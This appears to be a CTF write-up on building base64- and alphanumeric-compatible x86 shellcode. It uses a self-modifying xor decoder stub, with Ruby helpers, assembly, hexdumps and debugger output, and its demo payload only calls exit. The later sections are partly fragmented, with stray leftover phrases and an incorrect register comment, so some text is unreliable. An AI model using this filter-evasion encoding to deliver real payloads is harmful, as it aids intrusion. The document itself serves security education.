Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There’s an easy solution - using an alphanumeric encoder - but what’s the fun in that? (also, I didn’t think of it :) ). I’m going to cover base64, but these exact same principles apply to alphanumeric - there’s absolutely on reason you couldn’t change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we’re going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I’ll also post a link to a tool I wrote to automate this.

I can’t promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don’t want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string was run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign (“=”) or two on the end, but that’s not really useful.

We’re going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it’d be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we’ll see used throughout this blog, but I didn’t keep that code. Instead, I’m going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [
      instruction.bytes.map() { |b| '%02x' % b }.join(' '),
      instruction.mnemonic.to_s,
      instruction.op_str.to_s
    ]
  end
end

I’d probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that’s easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that’s useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn’t be useful, but that I didn’t want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls (“int 0x80” in assembly or “\xcd\x80” in machine code; we’ll see how that winds up being the most problematic piece!).

For the purposes of this blog, we’re going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace

Here’s the shellcode we’re going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We’ll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
[...]
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We’re going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let’s take a quick look at a simple character restriction: NUL bytes. It’s commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It’s usually pretty straight forward to get rid of NUL bytes by just looking at where they appear and fixing them; it’s almost always the case that it’s caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the last byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I’m going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let’s look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file                               65 [11:16:34]
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren’t so close: the only line that’s actually compatible is “inc eax”. I guess we can start the long journey!

Let’s start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

35 ?? ?? ?? ?? xor eax,0x????????
68 ?? ?? ?? ?? push dword 0x????????
58 pop eax

Let’s start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we’re pushing 0, we end up with a NUL byte. So let’s push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells “hAAAAX”, which is a fun coincidence. :)

The problem is, eax doesn’t end up as 0, it’s 0x41414141. You can verify this by adding “int 3” at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you’re following along, I’m using it constantly to verify my code snippings, but I’ll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don’t like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let’s do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let’s look at why!

We’ll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end
  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
...
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>
...

Basically, we can encode any value that doesn’t have the most-significant bit set (ie, anything under 0x80). That’s going to be a problem that we’ll deal with much, much later.

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]


  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('----------')
  puts('0x%08x' % (result[0] ^ result[1]))
  puts()

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won’t work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)
0x42414141
0x43434245
----------
0x01020304

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)
0x6a6a6a6a
0x2b2b2b2b
----------
0x41414141

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32(0x01)
0x41414142
0x41414143
----------
0x00000001

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it’s base-64-compatible; I believe in doing this, because every once in awhile an instruction like “inc eax” (which becomes ‘@’) will slip in when I’m not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

We’ll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It’s the most fundamental building block of this project!

Setting other registers

Sadly, unless I missed something, there’s no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don’t have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

58 pop eax
59 pop ecx
5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the “[” at the end - that’s not in our character set! So we’re pretty much limited to using eax, ecx, and edx for most things.

But wait, there’s more! We do, however, have access to popad. The popad instruction pops the next 8 things off the stack and puts them in all 8 registers. It’s a bit of a scorched-earth method, though, because it overwrites all registers. We’re going to use it at the start of our code to zero-out all the registers.

Let’s try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that’s base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141
popad

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
...
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You’ve probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it’s our working register). And what if you need an instruction (like add, or shift) that isn’t available? Do we just simulate it?

As I’m sure you’ve noticed, the machine code is just a bunch of bytes. What’s stopping us from simply encoding the machine code rather than just values?

Let’s take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because ‘mov’ assembles to 0xb8XXXXXX, I don’t want to deal with that yet (the most-significant bit is set). So let’s change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let’s pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with ‘A’, because it’s as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

6a 01 58 68 -> 0x6858016a
41 41 41 41 -> 0x41414141
5b 41 41 41 -> 0x4141415b

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let’s start our decoder by simply calculating each of these values in eax, just to prove that they’re all base64-compatible (note that we are simply discarding the values in this example, we aren’t doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we’ve proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We’ll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let’s look back at the list of available instructions! After some searching, I found one that’s promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the “0x??” value has to also be a base64 character, we’ll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that’s basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let’s start by looking at the steps involved:

Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
For each 32-bit pair in the encoded shellcode...
- Load the other half of the xor pair into edx
- Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
- Increment ecx to point at the next value
- Repeat for the full payload
Run the newly decoded payload

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAA'

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){
     exit(0);
   }

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

$ gcc -m32 -o run_raw_code run_raw_code.c

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
[...]
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-db 'AAAAAAAAAAAAAAAAA'
+db 'AAAAAAAAAAAAAAAA', 0xcc

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

inc ecx

That pesky most-significant-bit

set of available instructions

probably

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

xor [ecx+0x41], edx

Setting edx to 0x00008000, 0x00800000, or 0x80000000

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not <em>really</em> necessary, but it's nice to do it
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New

Putting it all together

my final code

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |......AAAA..|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |......AAAA..|

38 01 00 00 -> 0x00000138
00 3b 41 41 -> 0x41413b00

41 41 4d 00 -> 0x004d4141 </ul> And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

80 00 00 00 -> 0x00000080
00 80 00 00 -> 0x00008000

00 00 80 80 -> 0x80800000 </ul> Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free vale, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAA'

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data. We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ). I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

